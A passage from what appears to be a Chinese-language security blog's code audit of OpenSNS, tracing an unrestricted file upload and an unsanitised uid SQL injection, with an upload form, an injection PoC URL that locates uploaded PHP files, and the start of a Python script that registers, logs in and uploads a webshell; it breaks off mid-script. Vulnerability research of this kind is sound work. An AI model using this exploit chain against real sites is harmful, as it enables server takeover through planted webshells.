&#125;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="comment">/* 保存文件 并记录保存成功的文件 */</span></span><br><span class="line">            <span class="keyword">if</span> (<span class="variable language_">$this</span>-&gt;uploader-&gt;<span class="title function_ invoke__">save</span>(<span class="variable">$file</span>, <span class="variable">$this</span>-&gt;replace)) &#123;</span><br><span class="line">                <span class="keyword">unset</span>(<span class="variable">$file</span>[<span class="string">&#x27;error&#x27;</span>], <span class="variable">$file</span>[<span class="string">&#x27;tmp_name&#x27;</span>]);</span><br><span class="line">                <span class="variable">$info</span>[<span class="variable">$key</span>] = <span class="variable">$file</span>;</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                <span class="variable language_">$this</span>-&gt;error = <span class="variable language_">$this</span>-&gt;uploader-&gt;<span class="title function_ invoke__">getError</span>();</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$finfo</span>)) &#123;</span><br><span class="line">            <span class="title function_ invoke__">finfo_close</span>(<span class="variable">$finfo</span>);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">empty</span>(<span class="variable">$info</span>) ? <span class="literal">false</span> : <span class="variable">$info</span>;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>注释都写得很详细，可以看到文件上传检测调用了一个check函数，跟一下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="function"><span class="keyword">function</span> <span class="title">check</span>(<span class="params"><span class="variable">$file</span></span>)</span></span><br><span class="line"><span class="function">   </span>&#123;</span><br><span class="line">    <span class="comment">/*省略*/</span></span><br><span class="line">       <span class="comment">/* 检查文件Mime类型 */</span></span><br><span class="line">       <span class="comment">//<span class="doctag">TODO:</span>FLASH上传的文件获取到的mime类型都为application/octet-stream</span></span><br><span class="line">       <span class="keyword">if</span> (!<span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">checkMime</span>(<span class="variable">$file</span>[<span class="string">&#x27;type&#x27;</span>])) &#123;</span><br><span class="line">           <span class="variable language_">$this</span>-&gt;error = <span class="string">&#x27;上传文件MIME类型不允许！&#x27;</span>;</span><br><span class="line">           <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">       &#125;</span><br><span class="line"></span><br><span class="line">       <span class="comment">/* 检查文件后缀 */</span></span><br><span class="line">       <span class="keyword">if</span> (!<span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">checkExt</span>(<span class="variable">$file</span>[<span class="string">&#x27;ext&#x27;</span>])) &#123;</span><br><span class="line">           <span class="variable language_">$this</span>-&gt;error = <span class="string">&#x27;上传文件后缀不允许&#x27;</span>;</span><br><span class="line">           <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">       &#125;</span><br><span class="line"></span><br><span class="line">       <span class="comment">/* 通过检测 */</span></span><br><span class="line">       <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">   &#125;</span><br></pre></td></tr></table></figure>
<p>前面的部分省略，重点看文件mime类型和文件后缀的检测</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="function"><span class="keyword">function</span> <span class="title">checkExt</span>(<span class="params"><span class="variable">$ext</span></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">empty</span>(<span class="variable language_">$this</span>-&gt;config[<span class="string">&#x27;exts&#x27;</span>]) ? <span class="literal">true</span> : <span class="title function_ invoke__">in_array</span>(<span class="title function_ invoke__">strtolower</span>(<span class="variable">$ext</span>), <span class="variable">$this</span>-&gt;exts);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">private</span> <span class="function"><span class="keyword">function</span> <span class="title">checkMime</span>(<span class="params"><span class="variable">$mime</span></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">empty</span>(<span class="variable language_">$this</span>-&gt;config[<span class="string">&#x27;mimes&#x27;</span>]) ? <span class="literal">true</span> : <span class="title function_ invoke__">in_array</span>(<span class="title function_ invoke__">strtolower</span>(<span class="variable">$mime</span>), <span class="variable">$this</span>-&gt;mimes);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>可以看到这两个检测函数都是去查看$this-&gt;config中相对应的成员，如果为空直接返回true。看一下$config:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="variable">$config</span> = <span class="keyword">array</span>(</span><br><span class="line">        <span class="string">&#x27;mimes&#x27;</span> =&gt; <span class="keyword">array</span>(), <span class="comment">//允许上传的文件MiMe类型 （空）</span></span><br><span class="line">        <span class="string">&#x27;maxSize&#x27;</span> =&gt; <span class="number">0</span>, <span class="comment">//上传的文件大小限制 (0-不做限制)</span></span><br><span class="line">        <span class="string">&#x27;exts&#x27;</span> =&gt; <span class="keyword">array</span>(), <span class="comment">//允许上传的文件后缀   （还是空。。）</span></span><br><span class="line">        <span class="comment">/*......*/</span></span><br><span class="line">    );</span><br></pre></td></tr></table></figure>
<p>这就意味着我们可以上传任意文件！现在还有几个头疼的问题就是我们不知道上传路径是什么，文件上传之后有没有被改名，现在我们回到upload函数中</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* 生成保存文件名 */</span></span><br><span class="line"><span class="variable">$savename</span> = <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">getSaveName</span>(<span class="variable">$file</span>);</span><br><span class="line"><span class="keyword">if</span> (<span class="literal">false</span> == <span class="variable">$savename</span>) &#123;</span><br><span class="line">    <span class="keyword">continue</span>;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="variable">$file</span>[<span class="string">&#x27;savename&#x27;</span>] = <span class="variable">$savename</span>;</span><br><span class="line">    <span class="comment">//$file[&#x27;name&#x27;] = $savename;</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>跟进getSaveName函数。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="function"><span class="keyword">function</span> <span class="title">getSaveName</span>(<span class="params"><span class="variable">$file</span></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="variable">$rule</span> = <span class="variable language_">$this</span>-&gt;saveName;</span><br><span class="line">        <span class="keyword">if</span> (<span class="keyword">empty</span>(<span class="variable">$rule</span>)) &#123; <span class="comment">//保持文件名不变</span></span><br><span class="line">            <span class="comment">/* 解决pathinfo中文文件名BUG */</span></span><br><span class="line">            <span class="variable">$filename</span> = <span class="title function_ invoke__">substr</span>(<span class="title function_ invoke__">pathinfo</span>(<span class="string">&quot;_<span class="subst">&#123;$file[&#x27;name&#x27;]&#125;</span>&quot;</span>, PATHINFO_FILENAME), <span class="number">1</span>);</span><br><span class="line">            <span class="variable">$savename</span> = <span class="variable">$filename</span>;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="variable">$savename</span> = <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">getName</span>(<span class="variable">$rule</span>, <span class="variable">$file</span>[<span class="string">&#x27;name&#x27;</span>]);</span><br><span class="line">            <span class="keyword">if</span> (<span class="keyword">empty</span>(<span class="variable">$savename</span>)) &#123;</span><br><span class="line">                <span class="variable language_">$this</span>-&gt;error = <span class="string">&#x27;文件命名规则错误！&#x27;</span>;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"><span class="comment">/* 文件保存后缀，支持强制更改文件后缀（config为空直接拼接上传文件的后缀名）*/</span></span><br><span class="line">        <span class="variable">$ext</span> = <span class="keyword">empty</span>(<span class="variable language_">$this</span>-&gt;config[<span class="string">&#x27;saveExt&#x27;</span>]) ? <span class="variable">$file</span>[<span class="string">&#x27;ext&#x27;</span>] : <span class="variable language_">$this</span>-&gt;saveExt;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> <span class="variable">$savename</span> . <span class="string">&#x27;.&#x27;</span> . <span class="variable">$ext</span>;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>首先看一下saveName的值，依然是在config中：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27;saveName&#x27;</span> =&gt; <span class="keyword">array</span>(<span class="string">&#x27;uniqid&#x27;</span>, <span class="string">&#x27;&#x27;</span>), <span class="comment">//上传文件命名规则，[0]-函数名，[1]-参数，多个参数使用数组</span></span><br></pre></td></tr></table></figure>
<p>$rule不为空，上传的文件就一定会被重命名，之后$rule又进入了getName函数，继续跟</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="function"><span class="keyword">function</span> <span class="title">getName</span>(<span class="params"><span class="variable">$rule</span>, <span class="variable">$filename</span></span>)</span></span><br><span class="line"><span class="function">   </span>&#123;</span><br><span class="line">       <span class="variable">$name</span> = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">       <span class="comment">/*......*/</span></span><br><span class="line">       &#125; <span class="keyword">elseif</span> (<span class="title function_ invoke__">is_string</span>(<span class="variable">$rule</span>)) &#123; <span class="comment">//字符串规则</span></span><br><span class="line">           <span class="keyword">if</span> (<span class="title function_ invoke__">function_exists</span>(<span class="variable">$rule</span>)) &#123;</span><br><span class="line">               <span class="variable">$name</span> = <span class="title function_ invoke__">call_user_func</span>(<span class="variable">$rule</span>);</span><br><span class="line">           &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">               <span class="variable">$name</span> = <span class="variable">$rule</span>;</span><br><span class="line">           &#125;</span><br><span class="line">       &#125;</span><br><span class="line">       <span class="keyword">return</span> <span class="variable">$name</span>;</span><br><span class="line">   &#125;</span><br></pre></td></tr></table></figure>
<p>上面config中的uniqid是php内置的函数，掏出小本本来查一查。</p>
<blockquote>
<p>uniqid() 函数基于以微秒计的当前时间，生成一个唯一的 ID。</p>
</blockquote>
<p>上传文件命名的流程就很清晰了，首先利用uniqid()生成一个唯一id，然后拼接后缀名，对任意文件上传是没有影响的。<br>先上传一波试试</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">&quot;http://127.0.0.1/opensns/index.php?s=/weibo/share/doSendShare.html&quot;</span> <span class="attr">method</span>=<span class="string">&quot;post&quot;</span></span></span><br><span class="line"><span class="tag"><span class="attr">enctype</span>=<span class="string">&quot;multipart/form-data&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">label</span> <span class="attr">for</span>=<span class="string">&quot;file&quot;</span>&gt;</span>Filename:<span class="tag">&lt;/<span class="name">label</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;file&quot;</span> <span class="attr">name</span>=<span class="string">&quot;file_img&quot;</span> <span class="attr">id</span>=<span class="string">&quot;file&quot;</span> /&gt;</span> </span><br><span class="line"><span class="tag">&lt;<span class="name">br</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;text&quot;</span> <span class="attr">name</span>=<span class="string">&quot;content&quot;</span> <span class="attr">value</span>=<span class="string">&quot;123&quot;</span> <span class="attr">id</span>=<span class="string">&quot;1&quot;</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;text&quot;</span> <span class="attr">name</span>=<span class="string">&quot;query&quot;</span> <span class="attr">id</span>=<span class="string">&quot;2&quot;</span> <span class="attr">value</span>=<span class="string">&quot;app=Home&amp;model=File&amp;method=upload&amp;id=&quot;</span>/&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&quot;submit&quot;</span> <span class="attr">name</span>=<span class="string">&quot;submit&quot;</span> <span class="attr">value</span>=<span class="string">&quot;Submit&quot;</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>利用这个表单上传即可，但是。。。上传完了没有回显，惊不惊喜？意不意外？<br>现在回到<code>/Application/Home/Model/FileModel.class.php</code>中的upload函数中</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="variable">$info</span>)&#123; <span class="comment">//文件上传成功，记录文件信息</span></span><br><span class="line">    <span class="keyword">foreach</span> (<span class="variable">$info</span> <span class="keyword">as</span> <span class="variable">$key</span> =&gt; &amp;<span class="variable">$value</span>) &#123;</span><br><span class="line">    <span class="comment">/* 已经存在文件记录 */</span>  </span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$value</span>[<span class="string">&#x27;id&#x27;</span>]) &amp;&amp; <span class="title function_ invoke__">is_numeric</span>(<span class="variable">$value</span>[<span class="string">&#x27;id&#x27;</span>]))&#123;</span><br><span class="line">        <span class="keyword">continue</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* 记录文件信息 */</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">create</span>(<span class="variable">$value</span>) &amp;&amp; (<span class="variable">$id</span> = <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">add</span>()))&#123;</span><br><span class="line">	<span class="variable">$value</span>[<span class="string">&#x27;id&#x27;</span>] = <span class="variable">$id</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="comment">//<span class="doctag">TODO:</span> 文件上传成功，但是记录文件信息失败，需记录日志</span></span><br><span class="line">        <span class="keyword">unset</span>(<span class="variable">$info</span>[<span class="variable">$key</span>]);</span><br><span class="line">   &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">return</span> <span class="variable">$info</span>; <span class="comment">//文件上传成功</span></span><br></pre></td></tr></table></figure>
<p>大体看了看create和add函数，都是与数据库有关的操作，也就是说我们上传文件的信息保存在数据库中了。这时候就要请出seay代码审计系统中的神器——Mysql监控了。利用上面的表单上传一个文件，在mysql监控中搜索INSERT即可找到对应的表为<code>ocenter_file</code>。<br><img src="http://seaii-blog.com/usr/uploads/2017/05/opensns1.png"></p>
<p>从数据库里获取数据最好的方法是什么？当然是注入了！所以大牛轻描淡写的又挖了一枚注入，再膜一波。。。。。<br>注入出现在<code>Application/Ucenter/Controller/IndexController.class.php</code>的information函数中</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">information</span>(<span class="params"><span class="variable">$uid</span> = <span class="literal">null</span></span>)</span></span><br><span class="line"><span class="function">   </span>&#123;</span><br><span class="line">       <span class="comment">//调用API获取基本信息</span></span><br><span class="line">       <span class="comment">//TODO tox 获取省市区数据</span></span><br><span class="line">       <span class="variable">$user</span> = <span class="title function_ invoke__">query_user</span>(<span class="keyword">array</span>(<span class="string">&#x27;nickname&#x27;</span>, <span class="string">&#x27;signature&#x27;</span>, <span class="string">&#x27;email&#x27;</span>, <span class="string">&#x27;mobile&#x27;</span>, <span class="string">&#x27;rank_link&#x27;</span>, <span class="string">&#x27;sex&#x27;</span>, <span class="string">&#x27;pos_province&#x27;</span>, <span class="string">&#x27;pos_city&#x27;</span>, <span class="string">&#x27;pos_district&#x27;</span>, <span class="string">&#x27;pos_community&#x27;</span>), <span class="variable">$uid</span>);</span><br></pre></td></tr></table></figure>
<p>继续跟进query_user函数<br>位置：<code>/Application/Common/Model/UserModel.class.php</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">query_user</span>(<span class="params"><span class="variable">$pFields</span> = <span class="literal">null</span>, <span class="variable">$uid</span> = <span class="number">0</span></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="variable">$user_data</span> = <span class="keyword">array</span>();<span class="comment">//用户数据</span></span><br><span class="line">        <span class="variable">$fields</span> = <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">getFields</span>(<span class="variable">$pFields</span>);<span class="comment">//需要检索的字段</span></span><br><span class="line">        <span class="variable">$uid</span> = (<span class="title function_ invoke__">intval</span>(<span class="variable">$uid</span>) != <span class="number">0</span> ? <span class="variable">$uid</span> : <span class="title function_ invoke__">get_uid</span>());<span class="comment">//用户UID</span></span><br><span class="line">        <span class="comment">//获取缓存过的字段，尽可能在此处命中全部数据</span></span><br><span class="line"></span><br><span class="line">        <span class="keyword">list</span>(<span class="variable">$cacheResult</span>, <span class="variable">$fields</span>) = <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">getCachedFields</span>(<span class="variable">$fields</span>, <span class="variable">$uid</span>);</span><br><span class="line">        <span class="variable">$user_data</span> = <span class="variable">$cacheResult</span>;<span class="comment">//用缓存初始用户数据</span></span><br><span class="line">        <span class="comment">//从数据库获取需要检索的数据，消耗较大，尽可能在此代码之前就命中全部数据</span></span><br><span class="line">        <span class="keyword">list</span>(<span class="variable">$user_data</span>, <span class="variable">$fields</span>) = <span class="variable language_">$this</span>-&gt;<span class="title function_ invoke__">getNeedQueryData</span>(<span class="variable">$user_data</span>, <span class="variable">$fields</span>, <span class="variable">$uid</span>);</span><br><span class="line"><span class="comment">/*......*/</span></span><br></pre></td></tr></table></figure>
<p>注意看这里</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$uid</span> = (<span class="title function_ invoke__">intval</span>(<span class="variable">$uid</span>) != <span class="number">0</span> ? <span class="variable">$uid</span> : <span class="title function_ invoke__">get_uid</span>());</span><br></pre></td></tr></table></figure>
<p>这里只是在判断的时候讲$uid intval了一下，实际并没有对$uid造成任何影响，我们构造的语句依然可以带入数据库执行。后面$uid又进入了getNeedQueryData函数，跟下去</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="function"><span class="keyword">function</span> <span class="title">getNeedQueryData</span>(<span class="params"><span class="variable">$user_data</span>, <span class="variable">$fields</span>, <span class="variable">$uid</span></span>)</span></span><br><span class="line"><span class="function">   </span>&#123;</span><br><span class="line">       <span class="variable">$need_query</span> = <span class="title function_ invoke__">array_intersect</span>(<span class="variable">$this</span>-&gt;table_fields, <span class="variable">$fields</span>);</span><br><span class="line">       <span class="comment">//如果有需要检索的数据</span></span><br><span class="line">       <span class="keyword">if</span> (!<span class="keyword">empty</span>(<span class="variable">$need_query</span>)) &#123;</span><br><span class="line">           <span class="variable">$db_prefix</span>=<span class="title function_ invoke__">C</span>(<span class="string">&#x27;DB_PREFIX&#x27;</span>);</span><br><span class="line">           <span class="variable">$query_results</span> = <span class="title function_ invoke__">D</span>(<span class="string">&#x27;&#x27;</span>)-&gt;<span class="title function_ invoke__">query</span>(<span class="string">&#x27;select &#x27;</span> . <span class="title function_ invoke__">implode</span>(<span class="string">&#x27;,&#x27;</span>, <span class="variable">$need_query</span>) . <span class="string">&quot; from `<span class="subst">&#123;$db_prefix&#125;</span>member`,`<span class="subst">&#123;$db_prefix&#125;</span>ucenter_member` where uid=id and uid=<span class="subst">&#123;$uid&#125;</span> limit 1&quot;</span>); <span class="comment">/*****/</span>          </span><br></pre></td></tr></table></figure>
<p>可以看到$uid未做任何处理直接拼接语句，我们就可以通过这个注入来获取我们shell的文件名和路径了。<br>poc如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/opensns/index.php?s=/ucenter/index/information/uid/23333%20union%20(select%201,2,concat(savepath,savename),4%20from%20ocenter_file%20where%20savename%20like%200x252e706870%20order%20by%20id%20desc%20limit%200,1)%23.html</span><br></pre></td></tr></table></figure>
<p><img src="http://seaii-blog.com/usr/uploads/2017/05/opensns2.png"></p>
<h3 id="0x03漏洞利用"><a href="#0x03漏洞利用" class="headerlink" title="0x03漏洞利用"></a>0x03漏洞利用</h3><p>两个漏洞的利用方式已经在上面的分析过程中给出了，这里放一个py的利用脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> random</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">s = requests.Session()</span><br><span class="line">url = <span class="string">&#x27;http://10.10.10.139/opensns/&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">getRandomName</span>():</span><br><span class="line">    name = <span class="string">&#x27;&#x27;</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">4</span>):</span><br><span class="line">        name += <span class="built_in">chr</span>(random.randint(<span class="number">97</span>, <span class="number">122</span>))</span><br><span class="line">    <span class="keyword">return</span> name</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">register</span>():</span><br><span class="line">    <span class="keyword">global</span> s</span><br><span class="line">    registerUrl = url + <span class="string">&#x27;index.php?s=/ucenter/member/register.html&#x27;</span></span><br><span class="line">    nickname = getRandomName()</span><br><span class="line">    </span><br><span class="line">    headers = &#123;</span><br><span class="line">        <span class="string">&#x27;Referer&#x27;</span>: registerUrl,</span><br><span class="line">        <span class="string">&#x27;Content-Type&#x27;</span>: <span class="string">&#x27;application/x-www-form-urlencoded&#x27;</span>,</span><br><span class="line">    &#125;</span><br><span class="line">    data = &#123;</span><br><span class="line">        <span class="string">&#x27;role&#x27;</span>: <span class="string">&#x27;1&#x27;</span>,</span><br><span class="line">        <span class="string">&#x27;username&#x27;</span>: nickname+<span class="string">&#x27;@test.com&#x27;</span>, </span><br><span class="line">        <span class="string">&#x27;nickname&#x27;</span>: nickname, </span><br><span class="line">        <span class="string">&#x27;password&#x27;</span>: <span class="string">&#x27;123456&#x27;</span>, </span><br><span class="line">        <span class="string">&#x27;reg_type&#x27;</span>: <span class="string">&#x27;email&#x27;</span>,</span><br><span class="line">    &#125;</span><br><span class="line">    r = s.post(registerUrl, data=data, headers=headers)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> nickname</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">login</span>(<span class="params">username</span>):</span><br><span class="line">    <span class="keyword">global</span> s</span><br><span class="line">    loginUrl = url + <span class="string">&#x27;index.php?s=/ucenter/member/login.html&#x27;</span></span><br><span class="line"></span><br><span class="line">    headers = &#123;</span><br><span class="line">        <span class="string">&#x27;Referer&#x27;</span>: loginUrl,</span><br><span class="line">        <span class="string">&#x27;Content-Type&#x27;</span>: <span class="string">&#x27;application/x-www-form-urlencoded; charset=UTF-8&#x27;</span>,</span><br><span class="line">        <span class="comment">#&#x27;X-Requested-With&#x27;: &#x27;XMLHttpRequest&#x27;,</span></span><br><span class="line">    &#125;</span><br><span class="line">    data = &#123;</span><br><span class="line">        <span class="string">&#x27;username&#x27;</span>: username,</span><br><span class="line">        <span class="string">&#x27;password&#x27;</span>: <span class="string">&#x27;123456&#x27;</span>,</span><br><span class="line">        <span class="string">&#x27;remember&#x27;</span>: <span class="string">&#x27;0&#x27;</span>,</span><br><span class="line">        <span class="string">&#x27;from&#x27;</span>: loginUrl,</span><br><span class="line">    &#125;</span><br><span class="line">    r = s.post(loginUrl, data=data, headers=headers)</span><br><span class="line">    <span class="comment">#print(r.text)</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">upload</span>():</span><br><span class="line">    <span class="keyword">global</span> s</span><br><span class="line">    uploadUrl = url + <span class="string">&#x27;index.php?s=/weibo/share/doSendShare.html&#x27;</span></span><br><span class="line">    file = &#123;<span class="string">&#x27;file_img&#x27;</span>: <span class="built_in">open</span>(<span class="string">&#x27;l.php&#x27;</span>, <span class="string">&#x27;r&#x27;</span>)&#125;</span><br><span class="line">    data = &#123;</span><br><span class="line">        <span class="string">&#x27;content&#x27;</span>: <span class="string">&#x27;123&#x27;</span>,</span><br><span class="line">        <span class="string">&#x27;query&#x27;</span>: <span 